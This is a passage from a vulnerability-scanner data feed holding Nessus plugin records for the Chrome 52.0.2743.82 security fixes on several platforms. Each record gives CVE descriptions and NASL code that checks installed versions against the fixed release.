script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'52.0.2743.82', severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:50", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 52.0.2743.82.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2016-1706, CVE-2016-1708, CVE-2016-1709, CVE-2016-1710, CVE-2016-1711, CVE-2016-5127, CVE-2016-5128, CVE-2016-5129, CVE-2016-5130, CVE-2016-5131, CVE-2016-5132, CVE-2016-5133, CVE-2016-5134, CVE-2016-5135, CVE-2016-5136, CVE-2016-5137, CVE-2016-1705)", "cvss3": {}, "published": "2016-07-26T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2016:1485)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2016-1485.NASL", "href": "https://www.tenable.com/plugins/nessus/92552", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:1485. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92552);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_xref(name:\"RHSA\", value:\"2016:1485\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2016:1485)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 52.0.2743.82.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Chromium\nto crash, execute arbitrary code, or disclose sensitive information\nwhen visited by the victim. (CVE-2016-1706, CVE-2016-1708,\nCVE-2016-1709, CVE-2016-1710, CVE-2016-1711, CVE-2016-5127,\nCVE-2016-5128, CVE-2016-5129, CVE-2016-5130, CVE-2016-5131,\nCVE-2016-5132, CVE-2016-5133, CVE-2016-5134, CVE-2016-5135,\nCVE-2016-5136, CVE-2016-5137, CVE-2016-1705)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:1485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1706\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5129\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5132\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5133\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5137\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:1485\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-52.0.2743.82-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-52.0.2743.82-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-52.0.2743.82-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-52.0.2743.82-1.el6\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:06", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 52.0.2743.82. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple unspecified vulnerabilities exist that allow a remote attacker to cause a denial of service condition or possibly have other impact via unknown vectors.\n (CVE-2016-1705)\n\n - A sandbox protection bypass vulnerability exists in PPAPI due to a failure to validate the origin of IPC messages to the plugin broker process. An unauthenticated, remote attacker can exploit this to bypass the sandbox. (CVE-2016-1706)\n\n - A use-after-free error exists in Extensions due to a failure to consider object lifetimes during progress observation. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code.\n (CVE-2016-1708)\n\n - An array indexing error exists in the ByteArray::Get() function in data/byte_array.cc due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n (CVE-2016-1709)\n\n - A same-origin bypass vulnerability exists in Blink due to a failure to prevent window creation by a deferred frame. A remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-1710)\n\n - A same-origin bypass vulnerability exists in Blink due to a failure to disable frame navigation during a detach operation on a DocumentLoader object. A remote attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-1711)\n\n - A use-after-free error exists in Blink in the previousLinePosition() function. An unauthenticated, remote attacker can exploit this, via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-5127)\n\n - A same-origin bypass vulnerability exists in Google V8 due to a failure to prevent API interceptors from modifying a store target without setting a property. A remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-5128)\n\n - A flaw exists in V8 due to improper processing of left-trimmed objects. An unauthenticated, remote attacker can exploit this, via crafted JavaScript code, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-5129)\n\n - A flaw exists that is triggered when handling two forward navigations that compete in different frames. A remote attacker can exploit this to conduct a URL spoofing attack. (CVE-2016-5130)\n\n - A use-after-free error exists in libxml2 in the xmlXPtrRangeToFunction() function. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2016-5131)\n\n - A same-origin bypass vulnerability exists in the Service Workers subsystem due to a failure to properly implement the Secure Contexts specification during decisions about whether to control a subframe. A remote attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-5132)\n\n - A flaw exists in the handling of origin information during proxy authentication that allows a man-in-the-middle attacker to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream. (CVE-2016-5133)\n\n - A validation flaw exists in the Proxy Auto-Config (PAC) feature due to a failure to ensure that URL information is restricted to a scheme, host, and port. A remote attacker can exploit this to disclose credentials by operating a server with a PAC script. (CVE-2016-5134)\n\n - A cross-origin bypass vulnerability exists in Blink due to a failure to consider referrer-policy information inside an HTML document during a preload request. A remote attacker can exploit this to bypass the Content Security Policy (CSP) protection mechanism.\n (CVE-2016-5135)\n\n - A use-after-free error exists in Extensions that allows a remote attacker to dereference already freed memory, resulting in the execution of arbitrary code with elevated privileges. (CVE-2016-5136)\n\n - An information disclosure vulnerability exists in Blink when handling HTTP vs HTTPs ports in source expressions.\n An unauthenticated, remote attacker can exploit this to determine whether a specific HTTP Strict Transport Security (HSTS) web site has been visited by reading a CSP report. (CVE-2016-5137)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-07-29T00:00:00", "type": "nessus", "title": "Google Chrome < 52.0.2743.82 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_52_0_2743_82.NASL", "href": "https://www.tenable.com/plugins/nessus/92629", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92629);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2016-1705\",\n \"CVE-2016-1706\",\n \"CVE-2016-1708\",\n \"CVE-2016-1709\",\n \"CVE-2016-1710\",\n \"CVE-2016-1711\",\n \"CVE-2016-5127\",\n \"CVE-2016-5128\",\n \"CVE-2016-5129\",\n \"CVE-2016-5130\",\n \"CVE-2016-5131\",\n \"CVE-2016-5132\",\n \"CVE-2016-5133\",\n \"CVE-2016-5134\",\n \"CVE-2016-5135\",\n \"CVE-2016-5136\",\n \"CVE-2016-5137\"\n );\n script_bugtraq_id(92053);\n\n script_name(english:\"Google Chrome < 52.0.2743.82 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Mac OS X host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 52.0.2743.82. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple unspecified vulnerabilities exist that allow a\n remote attacker to cause a denial of service condition\n or possibly have other impact via unknown vectors.\n (CVE-2016-1705)\n\n - A sandbox protection bypass vulnerability exists in\n PPAPI due to a failure to validate the origin of IPC\n messages to the plugin broker process. An\n unauthenticated, remote attacker can exploit this to\n bypass the sandbox. (CVE-2016-1706)\n\n - A use-after-free error exists in Extensions due to a\n failure to consider object lifetimes during progress\n observation. An unauthenticated, remote attacker can\n exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code.\n (CVE-2016-1708)\n\n - An array indexing error exists in the ByteArray::Get()\n function in data/byte_array.cc due to improper \n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this to cause a heap-based\n buffer overflow, resulting in a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-1709)\n\n - A same-origin bypass vulnerability exists in Blink due\n to a failure to prevent window creation by a deferred\n frame. A remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-1710)\n\n - A same-origin bypass vulnerability exists in Blink due\n to a failure to disable frame navigation during a detach\n operation on a DocumentLoader object. A remote attacker\n can exploit this to bypass the same-origin policy.\n (CVE-2016-1711)\n\n - A use-after-free error exists in Blink in the\n previousLinePosition() function. An unauthenticated,\n remote attacker can exploit this, via crafted JavaScript\n code involving an @import at-rule in a Cascading Style\n Sheets (CSS) token sequence in conjunction with a\n rel=import attribute of a LINK element, to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2016-5127)\n\n - A same-origin bypass vulnerability exists in Google V8\n due to a failure to prevent API interceptors from\n modifying a store target without setting a property. A\n remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-5128)\n\n - A flaw exists in V8 due to improper processing of\n left-trimmed objects. An unauthenticated, remote\n attacker can exploit this, via crafted JavaScript code,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2016-5129)\n\n - A flaw exists that is triggered when handling two\n forward navigations that compete in different frames. A\n remote attacker can exploit this to conduct a URL\n spoofing attack. (CVE-2016-5130)\n\n - A use-after-free error exists in libxml2 in the\n xmlXPtrRangeToFunction() function. An unauthenticated,\n remote attacker can exploit this to dereference already\n freed memory, resulting in the execution of arbitrary\n code. (CVE-2016-5131)\n\n - A same-origin bypass vulnerability exists in the Service\n Workers subsystem due to a failure to properly implement\n the Secure Contexts specification during decisions about\n whether to control a subframe. A remote attacker can\n exploit this to bypass the same-origin policy.\n (CVE-2016-5132)\n\n - A flaw exists in the handling of origin information\n during proxy authentication that allows a\n man-in-the-middle attacker to spoof a\n proxy-authentication login prompt or trigger incorrect\n credential storage by modifying the client-server data\n stream. (CVE-2016-5133)\n\n - A validation flaw exists in the Proxy Auto-Config (PAC)\n feature due to a failure to ensure that URL information\n is restricted to a scheme, host, and port. A remote\n attacker can exploit this to disclose credentials by\n operating a server with a PAC script. (CVE-2016-5134)\n\n - A cross-origin bypass vulnerability exists in Blink due\n to a failure to consider referrer-policy information\n inside an HTML document during a preload request. A\n remote attacker can exploit this to bypass the Content\n Security Policy (CSP) protection mechanism.\n (CVE-2016-5135)\n\n - A use-after-free error exists in Extensions that allows\n a remote attacker to dereference already freed memory,\n resulting in the execution of arbitrary code with\n elevated privileges. (CVE-2016-5136)\n\n - An information disclosure vulnerability exists in Blink\n when handling HTTP vs HTTPs ports in source expressions.\n An unauthenticated, remote attacker can exploit this to\n determine whether a specific HTTP Strict Transport\n Security (HSTS) web site has been visited by reading a\n CSP report. (CVE-2016-5137)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2016/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c7c32d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 52.0.2743.82 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/29\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'52.0.2743.82', severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:04", "description": "Google Chrome Releases reports :\n\n48 security fixes in this release, including :\n\n- [610600] High CVE-2016-1706: Sandbox escape in PPAPI. Credit to Pinkie Pie xisigr of Tencent's Xuanwu Lab\n\n- [613949] High CVE-2016-1708: Use-after-free in Extensions. Credit to Adam Varsan\n\n- [614934] High CVE-2016-1709: Heap-buffer-overflow in sfntly. Credit to ChenQin of Topsec Security Team\n\n- [616907] High CVE-2016-1710: Same-origin bypass in Blink. Credit to Mariusz Mlynski\n\n- [617495] High CVE-2016-1711: Same-origin bypass in Blink. Credit to Mariusz Mlynski\n\n- [618237] High CVE-2016-5127: Use-after-free in Blink. Credit to cloudfuzzer\n\n- [619166] High CVE-2016-5128: Same-origin bypass in V8. Credit to Anonymous\n\n- [620553] High CVE-2016-5129: Memory corruption in V8. Credit to Jeonghoon Shin\n\n- [623319] High CVE-2016-5130: URL spoofing. Credit to Wadih Matar\n\n- [623378] High CVE-2016-5131: Use-after-free in libxml. Credit to Nick Wellnhofer\n\n- [607543] Medium CVE-2016-5132: Limited same-origin bypass in Service Workers. Credit to Ben Kelly\n\n- [613626] Medium CVE-2016-5133: Origin confusion in proxy authentication. Credit to Patch Eudor\n\n- [593759] Medium CVE-2016-5134: URL leakage via PAC script. Credit to Paul Stone\n\n- [605451] Medium CVE-2016-5135: Content-Security-Policy bypass.\nCredit to kingxwy\n\n- [625393] Medium CVE-2016-5136: Use after free in extensions. Credit to Rob Wu\n\n- [625945] Medium CVE-2016-5137: History sniffing with HSTS and CSP.\nCredit to Xiaoyin Liu\n\n- [629852] CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives.", "cvss3": {}, "published": "2016-07-25T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (6fae9fe1-5048-11e6-8aa7-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-npapi", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_6FAE9FE1504811E68AA73065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/92537", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92537);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (6fae9fe1-5048-11e6-8aa7-3065ec8fd3ec)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n48 security fixes in this release, including :\n\n- [610600] High CVE-2016-1706: Sandbox escape in PPAPI. Credit to\nPinkie Pie xisigr of Tencent's Xuanwu Lab\n\n- [613949] High CVE-2016-1708: Use-after-free in Extensions. Credit to\nAdam Varsan\n\n- [614934] High CVE-2016-1709: Heap-buffer-overflow in sfntly. Credit\nto ChenQin of Topsec Security Team\n\n- [616907] High CVE-2016-1710: Same-origin bypass in Blink. Credit to\nMariusz Mlynski\n\n- [617495] High CVE-2016-1711: Same-origin bypass in Blink. Credit to\nMariusz Mlynski\n\n- [618237] High CVE-2016-5127: Use-after-free in Blink. Credit to\ncloudfuzzer\n\n- [619166] High CVE-2016-5128: Same-origin bypass in V8. Credit to\nAnonymous\n\n- [620553] High CVE-2016-5129: Memory corruption in V8. Credit to\nJeonghoon Shin\n\n- [623319] High CVE-2016-5130: URL spoofing. Credit to Wadih Matar\n\n- [623378] High CVE-2016-5131: Use-after-free in libxml. Credit to\nNick Wellnhofer\n\n- [607543] Medium CVE-2016-5132: Limited same-origin bypass in Service\nWorkers. Credit to Ben Kelly\n\n- [613626] Medium CVE-2016-5133: Origin confusion in proxy\nauthentication. Credit to Patch Eudor\n\n- [593759] Medium CVE-2016-5134: URL leakage via PAC script. Credit to\nPaul Stone\n\n- [605451] Medium CVE-2016-5135: Content-Security-Policy bypass.\nCredit to kingxwy\n\n- [625393] Medium CVE-2016-5136: Use after free in extensions. Credit\nto Rob Wu\n\n- [625945] Medium CVE-2016-5137: History sniffing with HSTS and CSP.\nCredit to Xiaoyin Liu\n\n- [629852] CVE-2016-1705: Various fixes from internal audits, fuzzing\nand other initiatives.\"\n );\n # https://googlechromereleases.blogspot.nl/2016/07/stable-channel-update.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f4bd83a\"\n );\n # https://vuxml.freebsd.org/freebsd/6fae9fe1-5048-11e6-8aa7-3065ec8fd3ec.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e67e600e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n 